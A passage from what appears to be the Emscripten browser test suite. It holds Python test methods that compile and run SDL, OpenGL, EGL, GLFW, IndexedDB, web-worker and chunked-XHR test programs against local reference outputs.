self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
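# OFFSCREEN_FRAMEBUFFER is what allows GL rendering to work from the proxied pthread here;
# the non-threaded variant above does not need it.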
def _test_egl_width_height_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # mask to an unsigned 32-bit value (Python 2's adler32 can return a signed int)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception:
print('(sleep for server)')
time.sleep(1)
if i == 59:
raise Exception('the chunked XHR test server never became ready')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that processes have released their file
# locks and the test tearDown won't attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS=1', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
